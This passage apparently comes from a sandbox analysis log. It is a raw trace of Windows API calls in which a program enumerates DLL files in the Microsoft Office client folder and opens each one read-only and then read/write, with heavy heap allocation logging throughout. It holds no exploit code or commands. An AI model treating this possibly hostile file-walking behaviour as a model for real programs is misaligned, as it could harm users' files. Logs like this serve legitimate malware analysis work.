InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.705] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.705] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0c4cdf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0c4cdf5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0df0820, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="api-ms-win-core-timezone-l1-1-0.dll", cAlternateFileName="AP7902~1.DLL")) returned 1 [0099.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0099.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0099.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0099.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0099.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0099.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0099.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0099.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0099.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0099.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0099.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0099.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0099.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0099.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0099.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0099.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81078 [0099.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0099.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0099.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x816f0 [0099.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81078 | out: hHeap=0x20000) returned 1 [0099.706] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.706] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.706] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.706] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x816f0 | out: hHeap=0x20000) returned 1 [0099.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0099.706] AreFileApisANSI () returned 1 [0099.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 82 [0099.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0099.706] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.706] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0099.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.707] AreFileApisANSI () returned 1 [0099.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0099.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x60088 [0099.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x60088, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll") returned 82 [0099.707] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.708] GetFileType (hFile=0x27c) returned 0x1 [0099.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0099.708] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.708] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.708] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.708] CloseHandle (hObject=0x27c) returned 1 [0099.708] AreFileApisANSI () returned 1 [0099.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0099.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5fe78 [0099.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x5fe78, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll") returned 82 [0099.708] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.709] GetFileType (hFile=0x27c) returned 0x1 [0099.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fe78 | out: hHeap=0x20000) returned 1 [0099.709] CloseHandle (hObject=0x27c) returned 1 [0099.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0099.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0099.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0099.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0099.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0099.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0099.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0099.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0099.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0099.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0099.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0099.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0099.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0099.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0099.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0099.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0099.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0099.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0099.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0099.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0099.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0099.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0099.710] AreFileApisANSI () returned 1 [0099.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0099.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5f798 [0099.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x5f798, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll") returned 82 [0099.710] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0c4cdf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0c4cdf5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0df0820, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x48c0)) returned 1 [0099.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0099.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0099.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.710] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0c26cd1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0c26cd1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0e62fac, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="api-ms-win-core-xstate-l2-1-0.dll", cAlternateFileName="APA632~1.DLL")) returned 1 [0099.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0099.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693f0 [0099.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0099.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0099.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0099.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0099.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0099.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0099.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0099.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0099.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0099.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0099.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0099.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0099.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0099.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0099.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0099.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0099.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cae8 [0099.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0099.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0099.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ced8 [0099.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0099.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ced8 | out: hHeap=0x20000) returned 1 [0099.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0099.711] AreFileApisANSI () returned 1 [0099.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll", lpUsedDefaultChar=0x0) returned 80 [0099.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0099.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0099.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.711] AreFileApisANSI () returned 1 [0099.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0099.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c8f0 [0099.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8c8f0, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll") returned 80 [0099.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.712] GetFileType (hFile=0x27c) returned 0x1 [0099.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c8f0 | out: hHeap=0x20000) returned 1 [0099.712] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.712] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.712] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.712] CloseHandle (hObject=0x27c) returned 1 [0099.713] AreFileApisANSI () returned 1 [0099.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0099.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d370 [0099.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8d370, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll") returned 80 [0099.713] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.713] GetFileType (hFile=0x27c) returned 0x1 [0099.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d370 | out: hHeap=0x20000) returned 1 [0099.713] CloseHandle (hObject=0x27c) returned 1 [0099.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0099.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0099.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0099.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0099.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0099.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0099.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0099.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0099.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0099.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0099.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0099.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0099.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0099.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0099.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0099.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0099.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0099.714] RtlAllocateHeap 